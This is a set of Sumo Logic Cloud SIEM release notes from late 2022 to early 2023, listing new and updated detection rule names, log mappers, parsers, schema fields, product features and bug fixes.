Bug Fixes

  • In some cases, inventory data from an AWS EC2 source was not being displayed in Cloud SIEM properly.
  • For Yara-based signals with file attachments, users were unable to download the file.
  • Occasionally, some related Entities were not visible in the Insight Related Entities graph but were included correctly on the list.
  • Entity suppression state was being reported incorrectly on several screens.
  • The Manage Entity Groups permission was required to view Entity Groups. Now only View Entity Groups is required.
  • Links to the Cloud SIEM API no longer require a trailing slash.

April 7, 2023 - Content Release

This release includes bug fixes for several rules using match lists using the "column" field in the rule expression.

Rules

  • [New] FIRST-S00030 First Seen Outbound Connection to External IP Address on Port 445 from IP Address; External connections over the internet to port 445 could be indictative of hash leak attempts, including exploitation attempts for vulnerabilities such as CVE-2023-2397. This alert looks at a source IP address making a connection to a new external destination IP address since the baseline period.
  • [Updated] FIRST-S00029 First Seen Successful Authentication From Unexpected Country; Added additional logic to help reduce false positives
  • [Updated] THRESHOLD-S00096 Brute Force Attempt
  • [Updated] MATCH-S00565 Direct Outbound DNS Traffic
  • [Updated] THRESHOLD-S00103 Domain Brute Force Attempt
  • [Updated] THRESHOLD-S00102 Domain Password Attack
  • [Updated] THRESHOLD-S00095 Password Attack
  • [Updated] CHAIN-S00008 Successful Brute Force

Log Mappers

  • [New] OpenVPN Logon Attempt
  • [New] OpenVPN Network Event
  • [New] Snowflake Catch All
  • [New] Snowflake Login
  • [New] Windows Defender ATP Alert
  • [Updated] Netskope - Audit Authentication Events - Logoff; Made eventID match more permissive

Parsers

  • [New] /Parsers/System/Snowflake/Snowflake
  • [New] /Parsers/System/Microsoft/Windows Defender ATP Alert JSON
  • [Updated] /Parsers/System/Cisco/Cisco ASA; Build/Teardown parsing bug fix
  • [Updated] /Parsers/System/OpenVPN/OpenVPN Syslog; Added support for additional format

March 24, 2023 - Content Release

Overall improvements to OOTB First Seen rules include minor baseline tweaks and severity adjustments for the following rules. For corrections involving logic adjustment, additional context is included within the individual rule. This update also adds Alternative Values for ProofPoint TAP Mappers.

Rules

  • [Updated] FIRST-S00002 First Seen AWS API Call from User; General logic improvement to filter on valid Identity type
  • [Updated] FIRST-S00023 First Seen AWS API Gateway Enumeration by User; General logic improvement to filter on valid application
  • [Updated] FIRST-S00024 First Seen AWS SSM RunShellScript SendCommand From User
  • [Updated] FIRST-S00026 First Seen Anonymous Logon Change Activity to Domain Controller
  • [Updated] FIRST-S00007 First Seen DynamoDB Enumeration from User
  • [Updated] FIRST-S00004 First Seen Local Group Addition by User
  • [Updated] FIRST-S00009 First Seen RDP Logon From User
  • [Updated] FIRST-S00022 First Seen S3 Bucket ACL Enumeration by User
  • [Updated] FIRST-S00025 First Seen SMB Allowed Traffic From IP
  • [Updated] FIRST-S00029 First Seen Successful Authentication From Unexpected Country
  • [Updated] FIRST-S00011 First Seen Sysmon IMPHASH - Global; Reconfigured to be disabled by default
  • [Updated] FIRST-S00012 First Seen Sysmon IMPHASH - Host; Reconfigured to be disabled by default
  • [Updated] FIRST-S00005 First Seen User Creation From User
  • [Updated] FIRST-S00008 First Seen whoami command From User

Log Mappers

  • [Updated] Proofpoint Targeted Attack Protection C2C - Click Blocked
  • [Updated] Proofpoint Targeted Attack Protection C2C - Click Permitted
  • [Updated] Proofpoint Targeted Attack Protection C2C - Message Blocked
  • [Updated] Proofpoint Targeted Attack Protection C2C - Message Delivered
  • [Updated] Proofpoint Targeted Attack Protection C2C - Message Permitted

March 16, 2023 - Application Update

Minor Changes and Enhancements

  • [New] The Entity Timeline can now be filtered by record type:
Entity Timeline Filter

Bug Fixes

  • When an Entity normalization lookup table was deleted and then re-created in the Sumo platform, the configuration in Cloud SIEM was not automatically updated, causing the normalization to fail.
  • Match lists with custom columns were not working properly during record processing.
  • The Network Blocks section was missing from the Entity details panel.
  • Links for schema tags were not displaying in the UI properly.

March 15, 2023 - Content Release

Rules

  • [New] CHAIN-S00013 GCP IDS Detection Followed by API Call; Detects a GCP IDS hit followed by an API call, indicating the source IP was able to gain access to GCP.
  • [Updated] THRESHOLD-S00087 Slack - Possible Session Hijacking; Adjusts "Slack - Possible Session Hijacking" to use 'sessionId' schema field.

Log Mappers

  • [New] GCP IDS; Mapper for GCP IDS events
  • [New] Netskope - Catch All; Added 'Catch All' Mapper to account for unavailability of event identifier in all messages.
  • [New] Slack Login; Added mapping specific to logon success/failure events
  • [Updated] Slack Catch All; Adjusts mapper use new sessionIdschema field in place of sourceUid

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco Firepower Syslog; Adjusts Cisco Firepower parser for some FTD events and corrected routing for Snort like and ASA messages which pass through the Firepower parser.
  • [Updated] /Parsers/System/Google/GCP; Adds additional time format handling

Schema

  • [New] sessionId; An ephemeral and at least semi-unique identifier of a connection between two systems (e.g., HTTP session, user logon session, TCP session identifiers)

March 10, 2023 - Content Release

This release contains a new set of mappers related to AWS CloudTrail Lambda functions, permissions, and sources and how changes related to them can align across our schema. In addition to that we have a correction to the parsing rerouted path 'System' in the parser path for Snort-like formatted messages.

Log Mappers

  • [New] CloudTrail - lambda.amazonaws.com - AddLayerVersionPermission
  • [New] CloudTrail - lambda.amazonaws.com - AddPermission
  • [New] CloudTrail - lambda.amazonaws.com - CreateEventSourceMapping
  • [New] CloudTrail - lambda.amazonaws.com - CreateFunction
  • [New] CloudTrail - lambda.amazonaws.com - CreateFunctionUrlConfig
  • [New] CloudTrail - lambda.amazonaws.com - DeleteEventSourceMapping
  • [New] CloudTrail - lambda.amazonaws.com - DeleteFunction
  • [New] CloudTrail - lambda.amazonaws.com - DeleteFunctionUrlConfig
  • [New] CloudTrail - lambda.amazonaws.com - GetEventSourceMapping
  • [New] CloudTrail - lambda.amazonaws.com - GetFunction
  • [New] CloudTrail - lambda.amazonaws.com - GetFunctionConfiguration
  • [New] CloudTrail - lambda.amazonaws.com - GetFunctionUrlConfig
  • [New] CloudTrail - lambda.amazonaws.com - GetLayerVersionPolicy
  • [New] CloudTrail - lambda.amazonaws.com - GetPolicy
  • [New] CloudTrail - lambda.amazonaws.com - ListEventSourceMappings
  • [New] CloudTrail - lambda.amazonaws.com - ListFunctionUrlConfigs
  • [New] CloudTrail - lambda.amazonaws.com - ListFunctions
  • [New] CloudTrail - lambda.amazonaws.com - PublishLayerVersion
  • [New] CloudTrail - lambda.amazonaws.com - RemovePermission
  • [New] CloudTrail - lambda.amazonaws.com - UpdateEventSourceMapping
  • [New] CloudTrail - lambda.amazonaws.com - UpdateFunctionCode
  • [New] CloudTrail - lambda.amazonaws.com - UpdateFunctionConfiguration
  • [New] CloudTrail - lambda.amazonaws.com - UpdateFunctionUrlConfig

Parsers

  • [Updated] /Parsers/System/Suricata/Suricata Syslog

March 7, 2023 Application Update

Entity Relationship Graph

We are excited to announce the new Entity Relationship Graph. With this feature, you can now see a graphical visualization of all related Entities in an Insight, as well as additional relationships beyond the Insight. This enables you to more quickly understand relationships among Entities and the larger context behind a potential security threat.

note

This feature is available to all customers but is currently in Beta. If you encounter any issues with this feature, report them to Sumo Logic Support. We appreciate your feedback.

The Entity Relationship Graph (and the Related Entities list) displays all Entities involved in the Insight (those referred to in a record in a Signal in the Insight) as well as additional Entity relationships (for example, if Cloud SIEM detects an IP address may also have had a specific hostname at the time the Insight was generated).

However, unlike the Related Entities list, the graph can visualize additional Entity relationships that existed outside of the Insight during a specified time frame.

Both the list and this new graph are available on the Entities tab of the Insight details page:

The Entity Relationship Graph UI

You can toggle between the list view and the graph view using the control in the upper-right corner of the main panel.

Each node in the graph represents a single Entity. The graph also displays the relationship types and any Indicators. Hovering over an Entity will highlight it and all of its relationships to other Entities, and when an Entity is selected, details about the Entity are displayed on the right.

The graph also includes a number of controls for zoom, full screen mode, filtering by Entity type, and adjusting the time frame for relationship detection.

For more information about how to use the Entity Relationship Graph, see the online documentation. You will also see an introduction to the feature the first time you visit an Insight details page.

Minor Changes and Enhancements

  • [New] First Seen Rules now support the use of non-normalized record fields.
  • [New] When a file is attached to a Signal, it is now available via API (previously it would only be available if part of a Yara Signal or Threat Intel match). The endpoint is /api/v1/extracted-file?filename=
  • [Update] The default time frame on the Entity Timeline is now 3 days instead of 24 hours.
  • [Update] The http v2 Insight Action payload now includes a numeric severity value (1-4) in addition to the human-readable severity name (LOW, MEDIUM, HIGH, CRITICAL).
  • [Update] On the new Active Entities panel on the HUD, if the Entity is a Username, you can now navigate directly to that Entity’s Timeline by hovering over the Entity name and clicking the link.

Bug Fixes

  • In some cases, Cloud SIEM was unable to properly extract the user name from an AWS ARN.
  • A recent change caused checkboxes to malfunction in Firefox.
  • On the Entity Timeline record details, the timestamp wasn’t displaying properly.

March 2, 2023 - Content Release

This release contains changes to how the Palo Alto Firewall CSV parser handles timestamps. Time parsing now relies on _messagetime metadata generated at collection time. This allows individual sources to set timezone information if it is not available in the raw message and as a result, reflect more accurate timestamps for records being created.

Rules

  • [New] MATCH-S00844 LastPass - Account Created
  • [New] MATCH-S00854 LastPass - Failed Login
  • [New] MATCH-S00846 LastPass - Folder Permissions Updated
  • [New] MATCH-S00855 LastPass - Login
  • [New] MATCH-S00847 LastPass - Master Password Changed
  • [New] MATCH-S00848 LastPass - Password Changed
  • [New] MATCH-S00849 LastPass - Personal Share
  • [New] MATCH-S00850 LastPass - Policy Added
  • [New] MATCH-S00851 LastPass - Policy Deleted
  • [New] MATCH-S00852 LastPass - Shared Folder Created
  • [New] MATCH-S00853 LastPass - Super Admin Password Reset

Log Mappers

  • [New] LastPass - Account Created
  • [New] LastPass - Failed Login
  • [New] LastPass - Folder Permissions Updated
  • [New] LastPass - Login
  • [New] LastPass - Master Password Changed
  • [New] LastPass - Password Changed
  • [New] LastPass - Personal Share
  • [New] LastPass - Policy Modifications
  • [New] LastPass - Shared Folder Created
  • [New] LastPass - Super Admin Password Reset
  • [New] LastPass Catch All
  • [New] Sysdig Audit Trail JSON
  • [New] Sysdig Benchmark JSON
  • [New] Sysdig Command JSON
  • [New] Sysdig Connection JSON
  • [New] Sysdig File Access JSON
  • [New] Sysdig Kubernetes JSON
  • [New] Sysdig Policy Detection JSON
  • [New] Sysdig Scanning JSON
  • [Updated] Azure Firewall Network Rule
  • [Updated] Mimecast Email logs

Parsers

  • [New] /Parsers/System/LastPass/LastPass
  • [New] /Parsers/System/Sysdig/Sysdig JSON
  • [Updated] /Parsers/System/Microsoft/Microsoft Azure JSON
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV
  • [Updated] /Parsers/System/Microsoft/Shared/Windows Forwarding Headers
  • [Updated] /Parsers/System/Microsoft/Shared/Windows Text Transforms - Security
  • [Updated] /Parsers/System/Microsoft/Windows-Syslog Snare

February 24, 2023 - Content Release

This release includes small modifications to First Seen rule type baseline and retention periods, and switches rule status from Prototype state, allowing more of these rules to contribute to Cloud SIEM Insights. The Microsoft Office 365 Audit parser now formulates key value pairs from the 'OperationProperties' array included in some messages.

Rules

  • [Updated] FIRST-S00002 First Seen AWS API Call from User
  • [Updated] FIRST-S00023 First Seen AWS API Gateway Enumeration by User
  • [Updated] FIRST-S00024 First Seen AWS SSM RunShellScript SendCommand From User
  • [Updated] FIRST-S00003 First Seen AWS Secrets Manager API Call from User
  • [Updated] FIRST-S00001 First Seen Administrative Privileges Granted for User
  • [Updated] FIRST-S00026 First Seen Anonymous Logon Change Activity to Domain Controller
  • [Updated] FIRST-S00019 First Seen Azure Member Addition to Group from User
  • [Updated] FIRST-S00020 First Seen Azure OAUTH Application Consent from User
  • [Updated] FIRST-S00021 First Seen Azure Virtual Machine Run Command Issued by User
  • [Updated] FIRST-S00028 First Seen Common Windows Recon Commands From User
  • [Updated] FIRST-S00013 First Seen Driver Load - Global
  • [Updated] FIRST-S00014 First Seen Driver Load - Host
  • [Updated] FIRST-S00007 First Seen DynamoDB Enumeration from User
  • [Updated] FIRST-S00027 First Seen InstallUtil Allow List Bypass From User
  • [Updated] FIRST-S00017 First Seen Kerberoasting Attempt from User - Global
  • [Updated] FIRST-S00018 First Seen Kerberoasting Attempt from User - Host
  • [Updated] FIRST-S00004 First Seen Local Group Addition by User
  • [Updated] FIRST-S00015 First Seen Macro Execution from User
  • [Updated] FIRST-S00016 First Seen Non-Network Logon from User
  • [Updated] FIRST-S00010 First Seen PowerShell Execution from Computer
  • [Updated] FIRST-S00009 First Seen RDP Logon From User
  • [Updated] FIRST-S00025 First Seen SMB Allowed Traffic From IP
  • [Updated] FIRST-S00029 First Seen Successful Authentication From Unexpected Country
  • [Updated] FIRST-S00011 First Seen Sysmon IMPHASH - Global
  • [Updated] FIRST-S00012 First Seen Sysmon IMPHASH - Host

Parsers

  • [Updated] /Parsers/System/Microsoft/Office 365

February 22, 2023 - Content Release

Rules

  • [New] FIRST-S00001 First Seen Administrative Privileges Granted for User
  • [New] FIRST-S00003 First Seen AWS Secrets Manager API Call from User
  • [New] FIRST-S00004 First Seen Local Group Addition by User
  • [New] FIRST-S00005 First Seen User Creation From User
  • [New] FIRST-S00006 First Seen Weak Kerberos Encryption from User
  • [New] FIRST-S00007 First Seen DynamoDB Enumeration from User
  • [New] FIRST-S00008 First Seen whoami command From User
  • [New] FIRST-S00009 First Seen RDP From User
  • [New] FIRST-S00010 First Seen PowerShell Execution from Computer
  • [New] FIRST-S00011 First Seen Sysmon IMPHASH - Global
  • [New] FIRST-S00012 First Seen Sysmon IMPHASH - Host
  • [New] FIRST-S00013 First Seen Driver Load - Global
  • [New] FIRST-S00014 First Seen Driver Load - Host
  • [New] FIRST-S00015 First Seen Macro Execution from User
  • [New] FIRST-S00016 First Seen Non-Network Logon from User
  • [New] FIRST-S00017 First Seen Kerberoasting Attempt from User - Global
  • [New] FIRST-S00018 First Seen Kerberoasting Attempt from User - Host
  • [New] FIRST-S00019 First Seen Azure Member Addition to Group from User
  • [New] FIRST-S00020 First Seen Azure OAUTH Application Consent from User
  • [New] FIRST-S00021 First Seen Azure Virtual Machine Run Command Issued by User
  • [New] FIRST-S00022 First Seen S3 Bucket ACL Enumeration by User
  • [New] FIRST-S00023 First Seen AWS API Gateway Enumeration By User
  • [New] FIRST-S00024 First Seen AWS SSM RunShellScript SendCommand From User
  • [New] FIRST-S00025 First Seen SMB Allowed Traffic From IP
  • [New] FIRST-S00026 First Seen Anonymous Logon Change Activity to Domain Controller
  • [New] FIRST-S00027 First Seen InstallUtil Allow List Bypass From User
  • [New] FIRST-S00028 First Seen Common Windows Recon Commands From User
  • [Updated] MATCH-S00534 MacOS - Re-Opened Applications

Log Mappers

  • [New] CloudTrail - ecs.amazonaws.com - AwsApiCall-ExecuteCommand

February 22, 2023 Application Update

First Seen Rules

Sumo Logic is pleased to announce new features in Cloud SIEM that deliver enhanced User and Entity Behavioral Analytics (UEBA) capabilities. These new UEBA capabilities enable additional methods to detect and investigate anomalous or unexpected behavior that may signify a security threat.

The first feature is called a First Seen Rule. With this new rule type, Cloud SIEM can detect events such as “the first time a user logs in from a new location” without having to define a rule expression that is unique to each user in your environment (and the location(s) from which he/she usually logs in). Other examples include detecting the unusual granting of administrative privileges, Windows recon command, AWS Secrets Manager API calls, API gateway enumeration, and more.

First Seen Rules are defined like any other rule type, through the Content menu in Cloud SIEM.

A First Seen Rule definition

First Seen Rules operate based on a baseline. During this period of time - typically between 7 and 30 days - the system will learn what normal and expected behavior looks like. After the baseline is established, Cloud SIEM will begin generating Signals when unusual behavior is detected compared to that baseline. Baselines can be per-entity or global. (Note that the longer the baseline, the more accurate the model will be.)

Cloud SIEM will include a set of more than twenty First Seen Rules out of the box. These rules can be tuned and customized like any other rule type, and custom First Seen Rules can also be created.

For more information about how to use First Seen Rules, see the online documentation. You can also see an introduction to the feature by navigating to a new First Seen Rule in the Cloud SIEM UI.

Entity Timeline

Another new feature that will help analysts investigate unusual activity with user accounts is the Entity Timeline:

The Entity Timeline

This feature visualizes all activity for a user – including all normalized records – in an easy-to-read timeline, eliminating the need to perform manual record searches.

Related actions are grouped together and Signals and Insights generated on that user are also displayed in the timeline with the relevant record(s). Actions can be clicked on to see a more detailed set of information, and full details can be easily opened in a new tab.

The feature can be found on the new Timeline tab on each Username Entity’s Detail page with quick links from Signal and Insight detail pages (located with the Entity summaries). It is only available for the Username Entity type at this time.

For more information about how to use the Entity Timeline, see the online documentation.

Minor Changes and Enhancements

  • [Updated] Entities listed in the Signals index (sec_signal) now include criticality and suppressed attributes (which reflect the state of those Entities when the Signal was generated).
  • [New] The Cloud SIEM API now supports searching the Threat Intelligence data by sourceName.
  • [Updated] The Threat Intelligence API GetThreatIntelIndicators endpoint now supports data sets of more than 10,000 indicators.
  • [Updated] The Insights API now supports searching (filtering) by confidence score.
  • [Updated] Cloud SIEM now supports up to 1000 inventory-based Entity Groups (the previous limit was 50).
  • [Updated] When viewing an Insight, a label is displayed that indicates the source. When an Insight is generated by a Custom Insight, it will now say Custom Insight (Rule) (instead of Rule) and Custom Insight (Signal) (instead of Signal) to reduce confusion with Insights generated by the Insight Algorithm through standard Rules and Signals.
  • [New] Entity Groups can now be managed in bulk by uploading CSV files from the Entity Groups list page.

Bug Fixes

  • The consolidated Insight ‘board’ view was not displaying properly in some instances.
  • An improper error message was displayed when attempting to create a rule with the same name as one that already existed.
  • The Insight Updates section on the HUD was displaying incorrectly if there were no recent updates.
  • The Insight creation source label was not positioned properly when scrolling an Insight Details page.
  • Entity notes could not be deleted.

February 17, 2023 - Content Release

Rules

  • [New] MATCH-S00842 Suspicious Azure CLI Keys Access on Linux Host
  • [New] MATCH-S00843 Suspicious GCP CLI Keys Access on Linux Host

Note that the following updates do not change detection capabilities and are only updates to descriptions and other metadata.

  • [Updated] MATCH-S00308 AWS CloudTrail - OpsWorks Describe Permissions Event
  • [Updated] MATCH-S00210 AWS CloudTrail - SQS List Queues Event
  • [Updated] MATCH-S00238 AWS CloudTrail - sensitive activity in KMS
  • [Updated] MATCH-S00594 Alibaba ActionTrail KMS Activity
  • [Updated] MATCH-S00417 Attrib.exe use to Hide Files and Folders
  • [Updated] MATCH-S00786 Azure - SQL Database Export
  • [Updated] MATCH-S00304 External Device Installation Denied
  • [Updated] FIRST-S00022 First Seen S3 Bucket ACL Enumeration by User
  • [Updated] MATCH-S00614 GCP Audit KMS Activity
  • [Updated] MATCH-S00466 MsiExec Web Install
  • [Updated] MATCH-S00288 NotPetya Ransomware Activity
  • [Updated] MATCH-S00634 Okta Admin App Access Attempt Failed
  • [Updated] MATCH-S00633 Okta Admin App Accessed
  • [Updated] MATCH-S00756 Outlook Homepage Modification
  • [Updated] MATCH-S00465 PXELoot Utility
  • [Updated] MATCH-S00200 Potential Pass the Hash Activity
  • [Updated] MATCH-S00546 Potential Reconnaissance Obfuscation
  • [Updated] MATCH-S00265 QuarksPwDump Dump File Observed
  • [Updated] MATCH-S00747 Registry Modification - Active Setup
  • [Updated] MATCH-S00754 Registry Modification - Microsoft Office Test Function Registry Entry
  • [Updated] MATCH-S00422 Spaces Before File Extension
  • [Updated] MATCH-S00196 Successful Overpass the Hash Attempt
  • [Updated] MATCH-S00293 Suspicious External Device Installation
  • [Updated] MATCH-S00342 Suspicious use of Dev-Tools-Launcher
  • [Updated] MATCH-S00279 TAIDOOR RAT DLL Load

Log Mappers

  • [Deleted] Sysdig Monitor C2C
  • [New] CloudTrail - s3.amazonaws.com - GetBucketAcl
  • [Updated] CloudTrail - s3.amazonaws.com - CreateBucket
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketAcl
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketReplication
  • [Updated] Fortinet App Control Logs
  • [Updated] Fortinet DLP Logs
  • [Updated] Fortinet DNS Logs
  • [Updated] Fortinet Event Logs
  • [Updated] Fortinet IPS Logs
  • [Updated] Fortinet Traffic Logs
  • [Updated] Fortinet VOIP Logs
  • [Updated] Fortinet Virus Logs
  • [Updated] Fortinet Webfilter Logs

Parsers

  • [Deleted] /Parsers/System/Sysdig/Sysdig Monitor C2C
  • [Updated] /Parsers/System/Fortinet/Fortigate/Fortigate-Syslog
  • [Updated] /Parsers/System/Pulse Secure/Pulse Secure Appliance

February 13, 2023 - Application Update

Active Entities Panel

To assist analysts detect potential security issues as early as possible, a new panel has been added to the Heads Up Display (HUD):

Screenshot of the new Active Entities panel in Cloud SIEM

This panel lists the top five most active entities, ranked by Signal Severity Total. This metric, which was introduced with the Related Entities enhancement last year, is the total sum of the severities of all unique Signals the Entity appears in during the current Insight detection window (typically, the past 14 days).

The count of Active Signals (Signals within the detection window that have not been included in an Insight) is also listed.

When hovering over the Entity value, the Entity’s type will be displayed. The Entity value is a link to that Entity’s details page.

Analysts can use this tool to investigate what appears to be risky activity and potentially proactively security issues before they are raised to the level of an Insight.

Minor Changes and Enhancements

  • [New] When looking at Signals in the new sec_signal index, attributes and values in array fields are now properly supported by auto-parsing, syntax like count by, and features like right-click > filter selected value*.
  • [New] An attribute attackStage has been added to the new sec_signal index. This attribute summarizes the Mitre attack stage represented by the rule which triggered the signal. The value is defined the same way as the attack_stage attribute included in the older Signal forwarding feature.
  • [Updated] The subResolution attribute is now included in the Insight payload for http v2 actions.
  • [Updated] The way Release Notes are listed in the Cloud SIEM UI is changing. There is no longer a “bell” item on the top menu; it has been replaced with a link to the Release Notes page in the Help menu. In addition, Release Notes are now directly visible in the UI when they are published.
  • [New] When executing a context action on a Signal, fields will now be passed to the context action if they are available based on the record(s) in context.

Bug Fixes

  • The “Radar” graph of records, Signals and Insights on the HUD has been updated so that the discontinuity at the top of the Signals section of the graph has been removed.
  • When viewing the raw log message corresponding to a normalized record, the wrong message was displayed.
  • The Network Block(s) associated with an Entity were not listed on the Entity details page.
  • When testing Rule expressions, sometimes the selected Tuning expression was not included.
  • Changes to entity tags or Criticality were not being listed on the History section of the Entity.
  • Entity Criticality was sometimes not displaying properly on the Insight details page.

February 8, 2023 - Content Release

Rules

  • [New] MATCH-S00838 Azure Active Directory Authentication Method Changed
  • [New] MATCH-S00836 Azure Conditional Access Policy Disabled
  • [New] MATCH-S00839 Azure Virtual Machine RunCommand Issued
  • [New] MATCH-S00837 Kubernetes Secrets Enumeration via Kubectl
  • [New] MATCH-S00835 Possible Dynamic URL Domain
  • [New] CHAIN-S00012 Potential Azure Persistence via Automation Accounts
  • [New] MATCH-S00841 Suspicious AWS CLI Keys Access on Linux Host
  • [New] MATCH-S00840 Suspicious Lambda Function - IAM Policy Attached
  • [Updated] THRESHOLD-S00074 Excessive Firewall Denies
  • [Updated] LEGACY-S00008 Possible Dynamic DNS Domain
  • [Updated] LEGACY-S00108 Threat Intel - Matched File Hash

Log Mappers

  • [New] Airtable Audit C2C
  • [New] Cisco Meraki Catch All - Custom Parser
  • [Updated] Linux OS Syslog - Process fw - iptables Events
  • [Updated] Proofpoint Targeted Attack Protection C2C - Message Blocked
  • [Updated] Proofpoint Targeted Attack Protection C2C - Message Delivered
  • [Updated] Proofpoint Targeted Attack Protection C2C - Message Permitted
  • [Updated] Windows - Security - 4624

Parsers

  • [New] /Parsers/System/Airtable/Airtable Audit C2C
  • [Updated] /Parsers/System/Cisco/Cisco ASA
  • [Updated] /Parsers/System/Cisco/Cisco Meraki
  • [Updated] /Parsers/System/Google/G Suite Audit
  • [Updated] /Parsers/System/Linux/Linux OS Syslog
  • [Updated] /Parsers/System/Linux/Shared/Linux Shared Syslog Headers
  • [Updated] /Parsers/System/Okta/Okta

January 20, 2023 - Content Release

Rules

  • [New] THRESHOLD-S00111 Sharepoint - Excessive Documents Accessed by External IP
  • [New] THRESHOLD-S00110 Sharepoint - External IP Downloaded Excessive Documents
  • [Updated] THRESHOLD-S00101 Sharepoint - Excessive Documents Accessed by User

January 19, 2023 Application Update

Minor Changes and Enhancements

  • [Updated] On the HUD, the Insight Activity widget has been updated. When selecting the Insight to display, the HUD will now choose based on this order of preference: In “New”, Unassigned, Highest GIS Confidence Score, Highest Severity, Newest. In addition, the design has been updated to improve readability.
  • [New] Users who wish to substitute custom Insight status(es) for the built-in “In Progress” status can now do so. After creating and organizing the custom statu(es), the user can now disable the “In Progress” status. (It cannot be deleted.) Note that it can be disabled only if there are no Insights currently set to “In Progress.”
  • Changes to Entity tags and criticality now appear in the Entity’s change history list.
  • The Sumo Terraform provider now includes support for custom columns in match lists.
  • Kubernetes (k8s) attribute fields are now normalized to include the namespace. The normalized fields are: normalizedPodName, normalizedDeploymentName, and normalizedReplicaSetName.

Resolved Issues

  • Some Insights could not be closed via the UI (though they could via API).
  • In the consolidated (parent/child) Insight view, in “Board” mode, scrolling was not working properly. In addition, links to other orgs had an error in the URL (a duplicate “/sec”).

January 13, 2023 - Content Release

Rules

  • [New] MATCH-S00825 AWS Secrets Manager Enumeration
  • [New] MATCH-S00827 Exposed AWS SNS Topic Created
  • [New] MATCH-S00823 Exposed AWS SQS Queue Created
  • [New] MATCH-S00828 Office 365 Exchange Transport Rule Created
  • [New] MATCH-S00829 Office 365 Exchange Transport Rule Enabled
  • [New] MATCH-S00830 Office 365 Forwarding Rule Created
  • [New] MATCH-S00833 Office 365 Inbox Rule Created
  • [New] MATCH-S00832 Office 365 Inbox Rule Updated
  • [New] MATCH-S00831 Office 365 Unified Audit Logging Disabled
  • [New] MATCH-S00824 Potential XMRig Execution with Traffic
  • [New] MATCH-S00826 SSH Keys Added to EC2 Instance
  • [New] MATCH-S00834 Sensitive Registry Key (WDigest) Edit
  • [Updated] MATCH-S00480 Solarwinds Suspicious Child Processes
  • [Updated] MATCH-S00504 User Added to Local Administrators

Log Mappers

  • [New] Windows - Microsoft-Windows-Sysmon/Operational - 22
  • [New] Windows - Microsoft-Windows-Sysmon/Operational - 23
  • [New] Windows - Microsoft-Windows-Sysmon/Operational - 24
  • [New] Windows - Microsoft-Windows-Sysmon/Operational - 25
  • [New] Windows - Microsoft-Windows-Sysmon/Operational - 26
  • [New] Windows - Microsoft-Windows-Sysmon/Operational - 27
  • [New] Windows - Microsoft-Windows-Sysmon/Operational - 28
  • [Updated] Cloudflare - Logpush
  • [Updated] Microsoft Office 365 AzureActiveDirectory Events
  • [Updated] Microsoft Office 365 Exchange Mailbox Audit Events
  • [Updated] Microsoft Office 365 Exchange Mailbox Authentication Events
  • [Updated] Microsoft Office 365 ExchangeItem Events
  • [Updated] Microsoft Office 365 ExchangeItemGroup Events
  • [Updated] Microsoft Office 365 RecordType 105
  • [Updated] Microsoft Office 365 RecordType 37
  • [Updated] Microsoft Office 365 RecordType 57
  • [Updated] Office 365 - Exchange Admin Events

Parsers

  • [New] /Parsers/System/Microsoft/Windows-Syslog WinCollect

Schema

  • [Updated] device_k8s_normalizedDeploymentName
  • [Updated] device_k8s_normalizedPodName
  • [Updated] device_k8s_normalizedReplicaSetName
  • [Updated] dstDevice_k8s_normalizedDeploymentName
  • [Updated] dstDevice_k8s_normalizedPodName
  • [Updated] dstDevice_k8s_normalizedReplicaSetName
  • [Updated] srcDevice_k8s_normalizedDeploymentName
  • [Updated] srcDevice_k8s_normalizedPodName
  • [Updated] srcDevice_k8s_normalizedReplicaSetName

January 5, 2023 - Content Release

Rules

  • [Updated] MATCH-S00556 Outbound Data Transfer Protocol Over Non-standard Port

Log Mappers

  • [New] Google G Suite - login-email_forwarding_change
  • [New] Laurel Linux Audit - Catch All
  • [New] Laurel Linux Audit - System Call
  • [New] Laurel Linux Audit - User Logon
  • [Updated] Lacework Alert

Parsers

  • [New] /Parsers/System/AWS/AWS Security Hub
  • [New] /Parsers/System/Laurel/Laurel Linux Audit
  • [New] /Parsers/System/Signal Science/Signal Science WAF
  • [New] /Parsers/System/Workday/Workday

Schema

  • [Updated] device_k8s_deployment
  • [Updated] device_k8s_pod
  • [Updated] device_k8s_replicaSet
  • [Updated] dstDevice_k8s_deployment
  • [Updated] dstDevice_k8s_pod
  • [Updated] dstDevice_k8s_replicaSet
  • [Updated] srcDevice_k8s_deployment
  • [Updated] srcDevice_k8s_pod
  • [Updated] srcDevice_k8s_replicaSet

This is an archive of 2022 Cloud SIEM Release Notes. The current Cloud SIEM Release Notes are here.

To view the full archive, click here.


December 21, 2022 - Content Release

Rules

  • [Updated] MATCH-S00547 Script Execution Via WMI
  • [Updated] MATCH-S00684 Wget Passed to Script Execution Command

Log Mappers

  • [New] Azure Firewall Application Rule
  • [New] Azure Firewall DNS Proxy
  • [New] Azure Firewall Network Rule
  • [New] Microsoft O365 Exchange Message Trace C2C

Parsers

  • [New] /Parsers/System/Microsoft/O365 Exchange Message Trace C2C
  • [New] /Parsers/System/Microsoft/Windows XML from Azure
  • [Updated] /Parsers/System/Cisco/Cisco Firepower Syslog
  • [Updated] /Parsers/System/Microsoft/Microsoft Azure JSON

Schema

  • [New] email_recipient

December 14, 2022 - Content Release

Log Mappers

  • [Updated] Cisco ASA 710002-3 JSON
  • [Updated] Windows - Microsoft-Windows-PowerShell/Operational - 4104
  • [Updated] Windows - Microsoft-Windows-PowerShell/Operational - 4105
  • [Updated] Windows - Security - 4732

Parsers

  • [New] /Parsers/System/Snort/Snort
  • [Updated] /Parsers/System/Cisco/Cisco ASA
  • [Updated] /Parsers/System/Cisco/Cisco Firepower Syslog
  • [Updated] /Parsers/System/Okta/Okta
  • [Updated] /Parsers/System/Suricata/Suricata Syslog
  • [Updated] /Parsers/System/Zscaler/Zscaler Private Access/Zscaler Private Access-JSON

December 13, 2022 Application Update

New Entity Types

